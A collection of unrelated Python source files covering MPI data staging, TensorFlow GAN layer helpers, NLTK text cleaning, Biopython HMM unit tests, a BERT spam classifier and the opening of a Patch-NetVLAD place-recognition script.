file_stats[stage_filter] = 0 # len(allfiles)
# skip the rest if we want to prep staging only
if prepare_staging:
continue
# unit conversion
unit_convert_gb = 1. / float(1024 * 1024 * 1024)
# allreduce:
total_read = global_comm.allreduce(total_read)
total_write = global_comm.allreduce(total_write)
# convert units
total_read *= unit_convert_gb
total_write *= unit_convert_gb
# stage duration:
stage_duration = stage_stop - stage_start
# print
if grank == 0:
print(
f"""Staging {stage_filter} done.
Total number of files: {file_stats[stage_filter]}.
Elapsed time {stage_duration:.2f}s.
Read {total_read:.2f} GB (bandwidth: {total_read / stage_duration:.2f} GB/s).
Write {total_write:.2f} GB (bandwidth: {total_write / stage_duration:.2f} GB/s).
"""
)
# verify staging results if requested
if verify:
nvtx.range_push(f"stage_verify")
if local_rank == 0:
files = glob(os.path.join(stage_target_directory, os.path.basename(stage_filter)))
else:
files = []
if not full_dataset_per_node:
# if every node hosts a shard, we need to sum the results, if not we need to make sure everybody has the same
files_full = instance_comm.allgather(files)
files_full = set(itertools.chain(*files_full))
else:
files_full = set(files)
num_files = len(files_full)
# strip off the directory
checkfiles1 = sorted([os.path.basename(x) for x in files_full])
checkfiles2 = sorted([os.path.basename(x) for x in allfiles])
assert (num_files == file_stats[stage_filter])
assert (checkfiles1 == checkfiles2)
if irank == 0:
print(
f"Staged data for {stage_filter}: {num_files}, expected: {file_stats[stage_filter]}",
flush=True
)
nvtx.range_pop()
# close range
nvtx.range_pop()
return 121266, 15158
def stage_instance_data_nvme_instance_ranks(
global_comm, instance_comm, hdf5file, dataset, target_directory, instance_id, touch=False
):
gsize = global_comm.Get_size()
# grank = global_comm.Get_rank()
isize = instance_comm.Get_size()
irank = instance_comm.Get_rank()
# lsize = 4 # local_size # get the number of GPUs on each node
# lrank = grank // 4 # get the node-local rank
f = h5py.File(hdf5file, "r")
ds = f.get(dataset)
num_files = ds.shape[0]
# num_files = 100
# get shard range ========================================
# number of shards is the number of ranks in an instance
num_shards = isize
num_files_per_shard = num_files // num_shards
num_files_remainder = num_files % num_shards
# this is the sharding within each instance
shard_start = [0]
for i in range(1, num_shards):
# ensure that there is an even number of files
if i - 1 < num_files_remainder:
this_shard_start = shard_start[-1] + (num_files_per_shard + 1)
else:
this_shard_start = shard_start[-1] + num_files_per_shard
shard_start.append(this_shard_start)
shard_start.append(num_files)
ranges = []
for i in range(num_shards):
ranges.append((shard_start[i], shard_start[i + 1]))
shard_start, shard_end = ranges[irank]
# these ranges need to be split into the number of instances:
# st ----i0-------i1-------i2-------i3--------i4------i5----- sp
num_instances = gsize // isize
stepsize = (shard_end - shard_start) // num_instances
instance_shards = [shard_start + i * stepsize for i in range(num_instances)]
instance_shards.append(shard_end)
shard_start, shard_end = instance_shards[instance_id], instance_shards[instance_id + 1]
# ========================================================
chunk_size = 16
chunk_start = shard_start
files_local = []
while True:
chunk_end = min(shard_end, chunk_start + chunk_size)
data = ds[chunk_start:chunk_end]
for i in range(data.shape[0]):
if dataset == "labels":
id_ = "label"
else:
id_ = dataset
outputfile = id_ + "-" + "{:06}".format(chunk_start + i) + ".npy"
if touch:
subprocess.run(['touch', str(os.path.join(target_directory, outputfile))])
else:
np.save(os.path.join(target_directory, outputfile), data[i])
files_local.append(outputfile)
if chunk_end == shard_end:
break
chunk_start = chunk_end
return 0, 0
|
<reponame>IntuitionMachine/cppn-gan-vae-tensorflow
import math
import numpy as np
import tensorflow as tf
from tensorflow.python.framework import ops
#from utils import *
class batch_norm(object):
"""Code modification of http://stackoverflow.com/a/33950177"""
def __init__(self, batch_size, epsilon=1e-5, momentum = 0.1, name="batch_norm"):
with tf.variable_scope(name) as scope:
self.epsilon = epsilon
self.momentum = momentum
self.batch_size = batch_size
self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)
self.name=name
def __call__(self, x, train=True):
shape = x.get_shape().as_list()
with tf.variable_scope(self.name) as scope:
self.gamma = tf.get_variable("gamma", [shape[-1]],
initializer=tf.random_normal_initializer(1., 0.02))
self.beta = tf.get_variable("beta", [shape[-1]],
initializer=tf.constant_initializer(0.))
self.mean, self.variance = tf.nn.moments(x, [0, 1, 2])
return tf.nn.batch_norm_with_global_normalization(
x, self.mean, self.variance, self.beta, self.gamma, self.epsilon,
scale_after_normalization=True)
def binary_cross_entropy_with_logits(logits, targets, name=None):
"""Computes binary cross entropy given `logits`.
For brevity, let `x = logits`, `z = targets`. The logistic loss is
loss(x, z) = - sum_i (x[i] * log(z[i]) + (1 - x[i]) * log(1 - z[i]))
Args:
logits: A `Tensor` of type `float32` or `float64`.
targets: A `Tensor` of the same type and shape as `logits`.
"""
eps = 1e-12
with ops.op_scope([logits, targets], name, "bce_loss") as name:
logits = ops.convert_to_tensor(logits, name="logits")
targets = ops.convert_to_tensor(targets, name="targets")
return tf.reduce_mean(-(logits * tf.log(targets + eps) +
(1. - logits) * tf.log(1. - targets + eps)))
def conv_cond_concat(x, y):
"""Concatenate conditioning vector on feature map axis."""
x_shapes = x.get_shape()
y_shapes = y.get_shape()
return tf.concat(3, [x, y*tf.ones([x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]])])
def conv2d(input_, output_dim,
k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
name="conv2d"):
with tf.variable_scope(name):
w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],
initializer=tf.truncated_normal_initializer(stddev=stddev))
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')
biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))
conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())
return conv
def deconv2d(input_, output_shape,
k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
name="deconv2d", with_w=False):
with tf.variable_scope(name):
# filter : [height, width, output_channels, in_channels]
w = tf.get_variable('w', [k_h, k_h, output_shape[-1], input_.get_shape()[-1]],
initializer=tf.random_normal_initializer(stddev=stddev))
deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,
strides=[1, d_h, d_w, 1])
biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))
deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())
if with_w:
return deconv, w, biases
else:
return deconv
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
def linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):
shape = input_.get_shape().as_list()
with tf.variable_scope(scope or "Linear"):
matrix = tf.get_variable("Matrix", [shape[1], output_size], tf.float32,
tf.random_normal_initializer(stddev=stddev))
bias = tf.get_variable("bias", [output_size],
initializer=tf.constant_initializer(bias_start))
if with_w:
return tf.matmul(input_, matrix) + bias, matrix, bias
else:
return tf.matmul(input_, matrix) + bias
def fully_connected(input_, output_size, scope=None, stddev=0.1, with_bias = True):
shape = input_.get_shape().as_list()
with tf.variable_scope(scope or "FC"):
matrix = tf.get_variable("Matrix", [shape[1], output_size], tf.float32,
tf.random_normal_initializer(stddev=stddev))
result = tf.matmul(input_, matrix)
if with_bias:
bias = tf.get_variable("bias", [1, output_size],
initializer=tf.random_normal_initializer(stddev=stddev))
result += bias*tf.ones([shape[0], 1], dtype=tf.float32)
return result
|
import re, string
from nltk.stem.snowball import SnowballStemmer
from nltk.tokenize import word_tokenize
class Cleaners(object):
"""class for collecting cleaning methods"""
def __init__(self, stopwords=None):
if isinstance(stopwords, list):
self.stopwords = stopwords
elif isinstance(stopwords, str):
self._load_stopwords(stopwords)
else:
self.stopwords = None
def _load_stopwords(self, filename):
"""loads stopwords from file and clean them to list"""
with open(filename) as file:
stopwords = file.readlines()
stopwords_list = []
for line in stopwords:
stopwords_list.extend(line.strip().split(','))
# remove duplicates
stopwords_list = list(set(stopwords_list))
stopwords_list.remove('')
stopwords_list = [stopword.strip() for stopword in stopwords_list]
self.stopwords = filename
self.stopwords = stopwords_list
def stem(self, text, lang, as_list=True):
"""stems text using porter stemmer from nltk
Parameters
----------
text : string/list of strings of text to be stemmed
lang: string, language in which text is
as_list : boolean, return results as stemmed token string (True) or concatenate it one string?
Returns
-------
list of strings of lemmatized text
"""
stemmer = SnowballStemmer(lang)
if type(text) is not list:
text = text.split(' ')
stemmed_text = []
for word in text:
stemmed_text.append(stemmer.stem(word))
if as_list:
return stemmed_text
return ' '.join(stemmed_text)
def tokenize(self, texts):
"""tokenize text using nltk
Parameters
----------
texts : string of text to be tokenized
Returns
-------
list of strings (tokens)"""
# nltk tokenizer
if isinstance(texts, list):
tokenized = []
for text in texts:
tokenized.append(word_tokenize(text[0]))
return tokenized
return word_tokenize(texts)
def remove_stopwords(self, tokens, stopwords=None, return_string=False, min_len_tokens_kept=3):
"""remove stopwords from token list
Parameters
----------
tokens : list of tokens where stopwrods are to be removed
stopwords: list of stopwords. If this is None, takes default stopwords
return_string: instead of list return string
min_len_tokens_kept: minimum length of tokens kept
Returns
-------
list/string of tokens without stopwords"""
if stopwords is None:
stopwords = self.stopwords
result = [token for token in tokens if token not in stopwords and len(token) >= min_len_tokens_kept]
if return_string:
return ' '.join(result)
return result
def lower_text(self, text):
"""lowercase text
Parameters
----------
text : string of text to be turned lowercase
Returns
-------
string of text text in lowercase"""
return text.lower()
def remove_punctuation(self, text, custom_punctutation=None, replace_with=" "):
"""remove punctuation from text
Parameters
----------
text : string of text where punctuation is to be removed
custom_punctutation: string of custom punctutations to remove.
If None default punctuation is removed
replace_with: string with what punctuation to replace with
Returns
-------
string of text without punctutation """
punctuation = string.punctuation
if custom_punctutation is not None:
punctuation = punctuation + custom_punctutation
return "".join(char if char not in punctuation else replace_with for char in text)
def remove_excess_spaces(self, text):
"""removes excess spaces if more than one is in a row:
tere olen -> tere olen
Parameters
----------
text : string of text where excess spaces is to be removed
Returns
-------
string of text without excess space
"""
return re.sub(' +', ' ', text)
def replace_regex_pattern(self, pattern, text, replace=" ", escape_regex=False):
"""replaces regex patter in text with replace
Parameters
----------
text : string/list of strings of text where excess spaces is to be removed
patter: regex pattern which is replaced
replace: string with what pattern is to be replaced
escape_regex: escape regex pattern and evaluate it literally
Returns
-------
string of text (or list of strings if inut was list of strings) with regex pattern replaced
"""
if escape_regex:
regex_pattern = re.escape(pattern)
else:
regex_pattern = re.compile(pattern)
if type(text) is list:
result = []
for el in text:
result.append(re.sub(regex_pattern, replace, str(el)))
return result
return re.sub(regex_pattern, replace, str(text))
def replace_string_from_list(self, text, string_list, replace=' '):
"""replaces string in text with replace
Parameters
----------
text : string/list of strings of text where strings from stringlist is to be replaced
string_list: list of strings to be replaced
replace: string with what pattern is to be replaced
Returns
-------
string of text where string_list is replaced
"""
text = str(text)
for strng in string_list:
text = text.replace(strng, replace)
return text
|
<reponame>yangwu91/biopython
#!/usr/bin/env python
"""Test the HMM.MarkovModel and HMM.DynamicProgramming modules.
Also tests Training methods.
"""
# standard modules
from __future__ import print_function
import unittest
import math
# biopython
from Bio import Alphabet
from Bio.Seq import Seq
# stuff we are testing
from Bio.HMM import MarkovModel
from Bio.HMM import DynamicProgramming
from Bio.HMM import Trainer
# create some simple alphabets
class NumberAlphabet(Alphabet.Alphabet):
"""Numbers as the states of the model.
"""
letters = ['1', '2']
class LetterAlphabet(Alphabet.Alphabet):
"""Letters as the emissions of the model.
"""
letters = ['A', 'B']
# -- helper functions
def test_assertion(name, result, expected):
"""Helper function to test an assertion and print out a reasonable error.
"""
assert result == expected, "Expected %s, got %s for %s" \
% (expected, result, name)
class TrainingSequenceTest(unittest.TestCase):
def test_empty_state_training_sequence(self):
emission_seq = Seq('AB', LetterAlphabet())
state_seq = Seq('', NumberAlphabet())
training_seq = Trainer.TrainingSequence(emission_seq, state_seq)
assert training_seq.emissions == emission_seq
assert training_seq.states == state_seq
def test_valid_training_sequence(self):
emission_seq = Seq('AB', LetterAlphabet())
state_seq = Seq('12', NumberAlphabet())
training_seq = Trainer.TrainingSequence(emission_seq, state_seq)
assert training_seq.emissions == emission_seq
assert training_seq.states == state_seq
def test_invalid_training_sequence(self):
emission_seq = Seq('AB', LetterAlphabet())
state_seq = Seq('1', NumberAlphabet())
with self.assertRaises(ValueError):
Trainer.TrainingSequence(emission_seq, state_seq)
class MarkovModelBuilderTest(unittest.TestCase):
def setUp(self):
self.mm_builder = MarkovModel.MarkovModelBuilder(NumberAlphabet(),
LetterAlphabet())
def test_test_initialize(self):
"""Making sure MarkovModelBuilder is initialized correctly.
"""
expected_transition_prob = {}
expected_transition_pseudo = {}
expected_emission_prob = {('2', 'A'): 0, ('1', 'A'): 0,
('1', 'B'): 0, ('2', 'B'): 0}
expected_emission_pseudo = {('2', 'A'): 1, ('1', 'A'): 1,
('1', 'B'): 1, ('2', 'B'): 1}
assertions = []
test_assertion("Transition prob", self.mm_builder.transition_prob,
expected_transition_prob)
test_assertion("Transition pseudo",
self.mm_builder.transition_pseudo,
expected_transition_pseudo)
test_assertion("Emission prob", self.mm_builder.emission_prob,
expected_emission_prob)
test_assertion("Emission pseudo", self.mm_builder.emission_pseudo,
expected_emission_pseudo)
def test_allow_all_transitions(self):
"""Testing allow_all_transitions.
"""
self.mm_builder.allow_all_transitions()
expected_prob = {('2', '1'): 0, ('1', '1'): 0,
('1', '2'): 0, ('2', '2'): 0}
expected_pseudo = {('2', '1'): 1, ('1', '1'): 1,
('1', '2'): 1, ('2', '2'): 1}
test_assertion("Probabilities", self.mm_builder.transition_prob,
expected_prob)
test_assertion("Pseudo counts", self.mm_builder.transition_pseudo,
expected_pseudo)
def test_set_initial_probabilities(self):
self.mm_builder.set_initial_probabilities({})
test_assertion("Equal initial probabilities by default",
self.mm_builder.initial_prob, {'1': 0.5, '2': 0.5})
# initial probability sum > 1, should raise an exception
self.assertRaises(
Exception,
self.mm_builder.set_initial_probabilities,
{'1': 0.6, '2': 0.5})
# referencing invalid states should raise an exception
self.assertRaises(
Exception,
self.mm_builder.set_initial_probabilities,
{'666': 0.1})
self.mm_builder.set_initial_probabilities({'1': 0.2})
test_assertion("One default initial probability",
self.mm_builder.initial_prob, {'1': 0.2, '2': 0.8})
self.mm_builder.set_initial_probabilities({'1': 0.9, '2': 0.1})
test_assertion("Set initial probabilities",
self.mm_builder.initial_prob, {'1': 0.9, '2': 0.1})
def test_set_equal_probabilities(self):
self.mm_builder.allow_transition('1', '2', 0.05)
self.mm_builder.allow_transition('2', '1', 0.95)
self.mm_builder.set_equal_probabilities()
test_assertion("Equal initial probabilities",
self.mm_builder.initial_prob,
{'1': 0.5, '2': 0.5})
test_assertion("Equal transition probabilities",
self.mm_builder.transition_prob,
{('1', '2'): 0.5, ('2', '1'): 0.5})
test_assertion("Equal emission probabilities",
self.mm_builder.emission_prob,
{('2', 'A'): 0.25, ('1', 'B'): 0.25,
('1', 'A'): 0.25, ('2', 'B'): 0.25})
def test_set_random_probabilities(self):
self.mm_builder.allow_transition('1', '2', 0.05)
self.mm_builder.allow_transition('2', '1', 0.95)
self.mm_builder.set_random_probabilities()
test_assertion("Number of initial probabilities",
len(self.mm_builder.initial_prob),
len(self.mm_builder._state_alphabet.letters))
# To test this more thoroughly, perhaps mock random.random() and
# verify that it's being called as expected?
class HiddenMarkovModelTest(unittest.TestCase):
def setUp(self):
self.mm_builder = MarkovModel.MarkovModelBuilder(NumberAlphabet(),
LetterAlphabet())
def test_transitions_from(self):
"""Testing the calculation of transitions_from
"""
self.mm_builder.allow_transition('1', '2', 1.0)
self.mm_builder.allow_transition('2', '1', 0.5)
self.mm_builder.allow_transition('2', '2', 0.5)
self.mm_builder.set_initial_probabilities({})
self.mm = self.mm_builder.get_markov_model()
state_1 = self.mm.transitions_from("1")
expected_state_1 = ["2"]
state_1.sort()
expected_state_1.sort()
test_assertion("States reached by transitions from state 1",
state_1, expected_state_1)
state_2 = self.mm.transitions_from("2")
expected_state_2 = ["1", "2"]
state_2.sort()
expected_state_2.sort()
test_assertion("States reached by transitions from state 2",
state_2, expected_state_2)
fake_state = self.mm.transitions_from("Fake")
expected_fake_state = []
test_assertion("States reached by transitions from a fake transition",
fake_state, expected_fake_state)
def test_transitions_to(self):
"""Testing the calculation of transitions_to
"""
self.mm_builder.allow_transition('1', '1', 0.5)
self.mm_builder.allow_transition('1', '2', 0.5)
self.mm_builder.allow_transition('2', '1', 1.0)
self.mm_builder.set_initial_probabilities({})
self.mm = self.mm_builder.get_markov_model()
state_1 = self.mm.transitions_to("1")
expected_state_1 = ["1", "2"]
state_1.sort()
expected_state_1.sort()
test_assertion("States with transitions to state 1",
state_1, expected_state_1)
state_2 = self.mm.transitions_to("2")
expected_state_2 = ["1"]
state_2.sort()
expected_state_2.sort()
test_assertion("States with transitions to state 2",
state_2, expected_state_2)
fake_state = self.mm.transitions_to("Fake")
expected_fake_state = []
test_assertion("States with transitions to a fake transition",
fake_state, expected_fake_state)
def test_allow_transition(self):
"""Testing allow_transition
"""
self.mm_builder.allow_transition('1', '2', 1.0)
self.mm_builder.set_initial_probabilities({})
self.mm = self.mm_builder.get_markov_model()
state_1 = self.mm.transitions_from("1")
expected_state_1 = ["2"]
state_1.sort()
expected_state_1.sort()
test_assertion("States reached by transitions from state 1",
state_1, expected_state_1)
state_2 = self.mm.transitions_from("2")
expected_state_2 = []
state_2.sort()
expected_state_2.sort()
test_assertion("States reached by transitions from state 2",
state_2, expected_state_2)
state_1 = self.mm.transitions_to("1")
expected_state_1 = []
state_1.sort()
expected_state_1.sort()
test_assertion("States with transitions to state 1",
state_1, expected_state_1)
state_2 = self.mm.transitions_to("2")
expected_state_2 = ["1"]
state_2.sort()
expected_state_2.sort()
test_assertion("States with transitions to state 2",
state_2, expected_state_2)
def test_simple_hmm(self):
"""Test a simple model with 2 states and 2 symbols.
"""
# set initial probabilities
prob_initial = [0.4, 0.6]
self.mm_builder.set_initial_probabilities(
{'1': prob_initial[0], '2': prob_initial[1]})
# set transition probabilities
prob_transition = [[0.35, 0.65], [0.45, 0.55]]
self.mm_builder.allow_transition('1', '1', prob_transition[0][0])
self.mm_builder.allow_transition('1', '2', prob_transition[0][1])
self.mm_builder.allow_transition('2', '1', prob_transition[1][0])
self.mm_builder.allow_transition('2', '2', prob_transition[1][1])
# set emission probabilities
prob_emission = [[0.45, 0.55], [0.75, 0.25]]
self.mm_builder.set_emission_score('1', 'A', prob_emission[0][0])
self.mm_builder.set_emission_score('1', 'B', prob_emission[0][1])
self.mm_builder.set_emission_score('2', 'A', prob_emission[1][0])
self.mm_builder.set_emission_score('2', 'B', prob_emission[1][1])
# Check all two letter sequences using a brute force calculation
model = self.mm_builder.get_markov_model()
for first_letter in LetterAlphabet.letters:
for second_letter in LetterAlphabet.letters:
observed_emissions = [first_letter, second_letter]
viterbi = model.viterbi(observed_emissions, NumberAlphabet)
self._checkSimpleHmm(prob_initial, prob_transition,
prob_emission, viterbi, observed_emissions)
def _checkSimpleHmm(self, prob_initial, prob_transition, prob_emission,
viterbi, observed_emissions):
max_prob = 0
# expected first and second states in the sequence, calculated below
seq_first_state = None
seq_second_state = None
# convert the observed letters 'A' or 'B' into 0 or 1
letter1 = ord(observed_emissions[0]) - ord('A')
letter2 = ord(observed_emissions[1]) - ord('A')
for first_state in NumberAlphabet.letters:
for second_state in NumberAlphabet.letters:
# compute the probability of the state sequence first_state,
# second_state emitting the observed_emissions
state1 = ord(first_state) - ord('1')
state2 = ord(second_state) - ord('1')
prob = prob_initial[state1] * prob_emission[state1][letter1] *\
prob_transition[state1][state2] *\
prob_emission[state2][letter2]
if prob > max_prob:
seq_first_state = first_state
seq_second_state = second_state
max_prob = prob
max_prob = math.log(max_prob)
seq = viterbi[0]
prob = viterbi[1]
test_assertion("state sequence",
str(seq),
seq_first_state + seq_second_state)
test_assertion("log probability", round(prob, 11), round(max_prob, 11))
def test_non_ergodic(self):
"""Non-ergodic model (meaning that some transitions are not allowed)."""
# make state '1' the initial state
prob_1_initial = 1.0
self.mm_builder.set_initial_probabilities(
{'1': prob_1_initial})
# probabilities of transitioning from state 1 to 1, and 1 to 2
prob_1_to_1 = 0.5
prob_1_to_2 = 0.5
# set up allowed transitions
self.mm_builder.allow_transition('1', '1', prob_1_to_1)
self.mm_builder.allow_transition('1', '2', prob_1_to_2)
# Emission probabilities
# In state 1 the most likely emission is A, in state 2 the most
# likely emission is B. (Would be simpler just to use 1.0 and 0.0
# emission probabilities here, but the algorithm blows up on zero
# probabilities because of the conversion to log space.)
prob_1_A = 0.95
prob_1_B = 0.05
prob_2_A = 0.05
prob_2_B = 0.95
# set emission probabilities
self.mm_builder.set_emission_score('1', 'A', prob_1_A)
self.mm_builder.set_emission_score('1', 'B', prob_1_B)
self.mm_builder.set_emission_score('2', 'A', prob_2_A)
self.mm_builder.set_emission_score('2', 'B', prob_2_B)
# run the Viterbi algorithm to find the most probable state path
model = self.mm_builder.get_markov_model()
observed_emissions = ['A', 'B']
viterbi = model.viterbi(observed_emissions, NumberAlphabet)
seq = viterbi[0]
prob = viterbi[1]
# the most probable path must be from state 1 to state 2
test_assertion("most probable path", str(seq), '12')
# The probability of that path is the probability of starting in
# state 1, then emitting an A, then transitioning 1 -> 2, then
# emitting a B.
# Note that probabilities are converted into log space.
expected_prob = math.log(prob_1_initial)\
+ math.log(prob_1_A)\
+ math.log(prob_1_to_2)\
+ math.log(prob_2_B)
test_assertion("log probability of most probable path",
prob, expected_prob)
class ScaledDPAlgorithmsTest(unittest.TestCase):
def setUp(self):
# set up our Markov Model
mm_builder = MarkovModel.MarkovModelBuilder(NumberAlphabet(),
LetterAlphabet())
mm_builder.allow_all_transitions()
mm_builder.set_equal_probabilities()
mm = mm_builder.get_markov_model()
# now set up a test sequence
emission_seq = Seq("ABB", LetterAlphabet())
state_seq = Seq("", NumberAlphabet())
training_seq = Trainer.TrainingSequence(emission_seq, state_seq)
# finally set up the DP
self.dp = DynamicProgramming.ScaledDPAlgorithms(mm, training_seq)
def test_calculate_s_value(self):
"""Testing the calculation of s values.
"""
previous_vars = {('1', 0): .5,
('2', 0): .7}
s_value = self.dp._calculate_s_value(1, previous_vars)
class AbstractTrainerTest(unittest.TestCase):
def setUp(self):
# set up a bogus HMM and our trainer
hmm = MarkovModel.HiddenMarkovModel({}, {}, {}, {}, {})
self.test_trainer = Trainer.AbstractTrainer(hmm)
def test_ml_estimator(self):
"""Test the maximum likelihood estimator for simple cases.
"""
# set up a simple dictionary
counts = {('A', 'A'): 10,
('A', 'B'): 20,
('A', 'C'): 15,
('B', 'B'): 5,
('C', 'A'): 15,
('C', 'C'): 10}
results = self.test_trainer.ml_estimator(counts)
# now make sure we are getting back the right thing
result_tests = []
result_tests.append([('A', 'A'), float(10) / float(45)])
result_tests.append([('A', 'B'), float(20) / float(45)])
result_tests.append([('A', 'C'), float(15) / float(45)])
result_tests.append([('B', 'B'), float(5) / float(5)])
result_tests.append([('C', 'A'), float(15) / float(25)])
result_tests.append([('C', 'C'), float(10) / float(25)])
for test_result in result_tests:
assert results[test_result[0]] == test_result[1], \
"Got %f, expected %f for %s" % (results[test_result[0]],
test_result[1],
test_result[0])
def test_log_likelihood(self):
"""Calculate log likelihood.
"""
probs = [.25, .13, .12, .17]
log_prob = self.test_trainer.log_likelihood(probs)
expected_log_prob = -7.31873556778
assert abs(expected_log_prob - log_prob) < 0.1, \
"Bad probability calculated: %s" % log_prob
# run the tests
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
import os
import numpy as np
import pandas as pd
import seaborn as sb
import tensorflow as tf
import tensorflow_hub as hub
import sklearn.metrics
import sklearn.model_selection
from absl import logging
logging.set_verbosity(logging.INFO)
# !pip install sentencepiece
# in case there is no such file in local path
if not os.path.exists('tokenization.py'):
os.system('wget --quiet https://raw.githubusercontent.com/tensorflow/models/master/official/nlp/bert/tokenization.py')
import tokenization
class OverwriteLog():
# overwrite logging for kaggle kernel
def info(self, msg):
print(msg)
logging = OverwriteLog()
def load_data():
csv = '../input/sms-spam-collection-dataset/spam.csv'
train = pd.read_csv(csv, encoding = 'Windows-1252')
train['text'] = train.v2
train['target'] = (train.v1 == 'spam').astype(int)
return train
def get_bert_layer():
module_url = "https://tfhub.dev/tensorflow/bert_en_uncased_L-24_H-1024_A-16/1"
module_url = 'https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/2'
return hub.KerasLayer(module_url, trainable=True)
def get_tokenizer(bert_layer):
vocab_file = bert_layer.resolved_object.vocab_file.asset_path.numpy()
do_lower_case = bert_layer.resolved_object.do_lower_case.numpy()
return tokenization.FullTokenizer(vocab_file, do_lower_case)
def bert_encode(texts, tokenizer, max_len=512):
# encode texts
tokens, masks, segments = [], [], []
for text in texts:
text = tokenizer.tokenize(text)
text = text[:max_len - 2]
input_sequence = ["[CLS]"] + text + ["[SEP]"]
pad_len = max_len - len(input_sequence)
cur_tokens = tokenizer.convert_tokens_to_ids(input_sequence)
cur_tokens += [0] * pad_len
pad_masks = [1] * len(input_sequence) + [0] * pad_len
segment_ids = [0] * max_len
tokens.append(cur_tokens)
masks.append(pad_masks)
segments.append(segment_ids)
return np.array(tokens), np.array(masks), np.array(segments)
def build_model(bert_layer, max_len=512):
input_word_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_word_ids")
input_mask = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_mask")
segment_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="segment_ids")
pooled_output, sequence_output = bert_layer([input_word_ids, input_mask, segment_ids])
clf_output = sequence_output[:, 0, :]
net = tf.keras.layers.Dense(64, activation='relu')(clf_output)
net = tf.keras.layers.Dropout(0.2)(net)
net = tf.keras.layers.Dense(32, activation='relu')(net)
net = tf.keras.layers.Dropout(0.2)(net)
out = tf.keras.layers.Dense(1, activation='sigmoid')(net)
model = tf.keras.models.Model(inputs=[input_word_ids, input_mask, segment_ids], outputs=out)
model.compile(tf.keras.optimizers.Adam(lr=1e-5), loss='binary_crossentropy', metrics=['accuracy'])
return model
"""split the following codes into several chunks in Jyputer
for clearer reading and saved variables
"""
train = load_data()
X_train, X_val, y_train, y_val = sklearn.model_selection.train_test_split(train.text.values, train.target, test_size=0.2, random_state=0)
logging.info("Data loaded and split")
max_len = 120
bert_layer = get_bert_layer()
tokenizer = get_tokenizer(bert_layer)
logging.info("bert_layer and tokenizer built")
X_train = bert_encode(X_train, tokenizer, max_len=max_len)
X_val = bert_encode(X_val, tokenizer, max_len=max_len)
logging.info("Text tokenized")
# Build model
model = build_model(bert_layer, max_len=max_len)
model.summary()
logging.info("Model built")
# Run model
checkpoint = tf.keras.callbacks.ModelCheckpoint('bert.h5', monitor='val_accuracy', save_best_only=True, verbose=1)
earlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_accuracy', patience=5, verbose=1)
train_history = model.fit(
X_train, y_train,
validation_split=0.1,
epochs=1,
callbacks=[checkpoint, earlystopping],
batch_size=16,
verbose=1
)
logging.info("Model trainning complete")
# validation & predict
model.load_weights('bert.h5')
y_preds = model.predict(X_val).round().astype(int)
print("Validation accuracy score", sklearn.metrics.accuracy_score(y_preds, y_val))
|
#!/usr/bin/env python
'''
MIT License
Copyright (c) 2021 <NAME>, <NAME>, <NAME>, <NAME> and <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Performs place recognition using a two-stage image retrieval pipeline, where
the first step collects the top 100 database candidates and then geometric
verification produces the top 1 best match for every query. In this code, query
images are the image from webcam. Change the video index to select your webcam.
Requires feature_extract.py to be run first, on a folder of index/database
images.
Code already supports the datasets of Nordland, Pittsburgh 30k and Tokyo247,
please run tools/genImageListFile to create new imageNames files with your
filepaths pointing to where you saved these datasets (or, edit the text files
to remove the prefix and insert your own prefix).
'''
from __future__ import print_function
import os
import time
import argparse
import configparser
from os.path import join, isfile
from os.path import exists
from os import makedirs
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import numpy as np
import faiss
from tqdm.auto import tqdm
import cv2
from PIL import Image
from patchnetvlad.tools.datasets import PlaceDataset, input_transform
from patchnetvlad.tools.patch_matcher import PatchMatcher
from patchnetvlad.models.local_matcher import normalise_func, calc_keypoint_centers_from_patches as calc_keypoint_centers_from_patches
from patchnetvlad.models.models_generic import get_backend, get_model, get_pca_encoding
from patchnetvlad.tools import PATCHNETVLAD_ROOT_DIR
def apply_patch_weights(input_scores, num_patches, patch_weights):
output_score = 0
if len(patch_weights) != num_patches:
raise ValueError('The number of patch weights must equal the number of patches used')
for i in range(num_patches):
output_score = output_score + (patch_weights[i] * input_scores[i])
return output_score
def plot_two(im1, im2, inlier_keypoints_one, inlier_keypoints_two, score, image_index, window_name):
# Draw keypoints
kp_all1 = []
kp_all2 = []
matches_all = []
